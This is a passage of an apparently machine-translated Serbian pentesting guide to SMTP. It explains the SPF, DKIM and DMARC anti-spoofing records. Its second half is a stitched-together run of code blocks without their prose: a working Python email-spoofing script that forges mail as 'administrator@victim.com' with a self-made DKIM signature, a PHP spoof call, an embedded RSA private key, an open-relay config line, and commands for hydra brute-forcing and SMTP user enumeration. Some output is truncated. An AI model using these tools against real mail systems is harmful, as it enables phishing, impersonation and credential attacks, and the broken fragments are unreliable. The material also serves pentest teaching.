</details>

## SMTP Smuggling

Ranjivost SMTP transporta omogućila je zaobilaženje svih SMTP zaštita (proverite sledeći odeljak za više informacija o zaštitama). Za više informacija o SMTP transportu pogledajte:

<div data-gb-custom-block data-tag="content-ref" data-url='smtp-smuggling.md'>

[smtp-smuggling.md](smtp-smuggling.md)

</div>

## Mera protiv lažnog slanja mejlova

Organizacije su sprečene da neovlašćeno šalju e-poštu u njihovo ime korišćenjem **SPF**, **DKIM** i **DMARC** zbog jednostavnosti lažiranja SMTP poruka.

**Potpuni vodič za ove mere** dostupan je na [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

<div data-gb-custom-block data-tag="hint" data-style='danger'>

SPF je "zastareo" 2014. godine. To znači da umesto kreiranja **TXT zapisa** u `_spf.domain.com`, kreirate ga u `domain.com` koristeći **isti sintaksu**.\
Osim toga, da biste ponovo koristili prethodne SPF zapise, često je uobičajeno pronaći nešto poput `"v=spf1 include:_spf.google.com ~all"`

</div>

**Sender Policy Framework** (SPF) je mehanizam koji omogućava Mail Transfer Agents (MTA) da provere da li je host koji šalje e-poštu ovlašćen tako što upita listu ovlašćenih poštanskih servera definisanih od strane organizacija. Ova lista, koja specificira IP adrese/opsege, domene i druge entitete **ovlašćene da šalju e-poštu u ime imena domena**, uključuje različite "**Mehanizme**" u SPF zapisu.

#### Mehanizmi

Sa [Vikipedije](https://en.wikipedia.org/wiki/Sender\_Policy\_Framework):

| Mehanizam | Opis                                                                                                                                                                                                                                                                                                                         |
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Uvek se podudara; koristi se za podrazumevani rezultat poput `-all` za sve IP adrese koje se ne podudaraju sa prethodnim mehanizmima.                                                                                                                                                                                                                                  |
| A         | Ako ime domena ima adresni zapis (A ili AAAA) koji se može rešiti na adresu pošiljaoca, podudaraće se.                                                                                                                                                                                                                   |
| IP4       | Ako je pošiljalac u datom IPv4 opsegu adresa, podudara se.                                                                                                                                                                                                                                                                              |
| IP6       | Ako je pošiljalac u datom IPv6 opsegu adresa, podudara se.                                                                                                                                                                                                                                                                              |
| MX        | Ako ime domena ima MX zapis koji se rešava na adresu pošiljaoca, podudaraće se (tj. pošta dolazi sa jednog od dolaznih poštanskih servera domena).                                                                                                                                                                          |
| PTR       | Ako je ime domena (PTR zapis) za adresu klijenta u datoj domeni i to ime domena se rešava na adresu klijenta (forward-confirmed reverse DNS), podudara se. Ovaj mehanizam se ne preporučuje i treba ga izbegavati, ako je moguće.                                                                                     |
| EXISTS    | Ako dato ime domena se rešava na bilo koju adresu, podudara se (bez obzira na adresu na koju se rešava). Ovo se retko koristi. Uz SPF makro jezik nudi složenije podudaranje poput DNSBL-upita.                                                                                                                           |
| INCLUDE   | Referiše na politiku druge domene. Ako politika te domene prođe, ovaj mehanizam prolazi. Međutim, ako uključena politika ne uspe, obrada se nastavlja. Da bi se potpuno delegiralo politici druge domene, mora se koristiti proširenje preusmeravanja.                                                                                     |
| REDIRECT  | <p>Preusmeravanje je pokazivač na drugo ime domena koje hostuje SPF politiku, omogućava više domena da dele istu SPF politiku. Korisno je kada radite sa velikim brojem domena koji dele istu email infrastrukturu.</p><p>SPF politika domena naznačena u mehanizmu preusmeravanja će biti korišćena.</p> |

Takođe je moguće identifikovati **Kvalifikatore** koji ukazuju **šta treba uraditi ako se mehanizam podudara**. Podrazumevano se koristi **kvalifikator "+"** (tako da ako se podudari bilo koji mehanizam, to znači da je dozvoljeno).\
Obično ćete primetiti **na kraju svake SPF politike** nešto poput: **\~all** ili **-all**. Ovo se koristi da bi se naznačilo da **ako pošiljalac ne odgovara nijednoj SPF politici, trebalo bi označiti e-poštu kao nepoverljivu (\~) ili odbiti (-) e-poštu.**

#### Kvalifikatori

Svaki mehanizam unutar politike može biti prefiksan jednim od četiri kvalifikatora kako bi se definisao željeni rezultat:

* **`+`**: Odgovara rezultatu PROLAZ. Podrazumevano, mehanizmi pretpostavljaju ovaj kvalifikator, čineći `+mx` ekvivalentnim `mx`.
* **`?`**: Predstavlja NEUTRALAN rezultat, tretiran slično kao NIKO (bez specifične politike).
* **`~`**: Označava SOFTFAIL, služeći kao srednje rešenje između NEUTRALNO i GREŠKA. E-poruke koje zadovolje ovaj rezultat obično se prihvataju ali se označavaju prema tome.
* **`-`**: Označava GREŠKA, sugerišući da bi e-pošta trebalo direktno odbiti.

U sledećem primeru, **SPF politika google.com** je ilustrovana. Obratite pažnju na uključivanje SPF politika iz različitih domena unutar prve SPF politike:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

mynetworks = 0.0.0.0/0

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

# Ovo će poslati nepotpisanu poruku
mail("vas_email@gmail.com", "Testni predmet!", "hej! Ovo je test", "Od: administrator@žrtva.com");

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

sendmail.cf
submit.cf

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.xyz/pentesting/pentesting-smtp

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'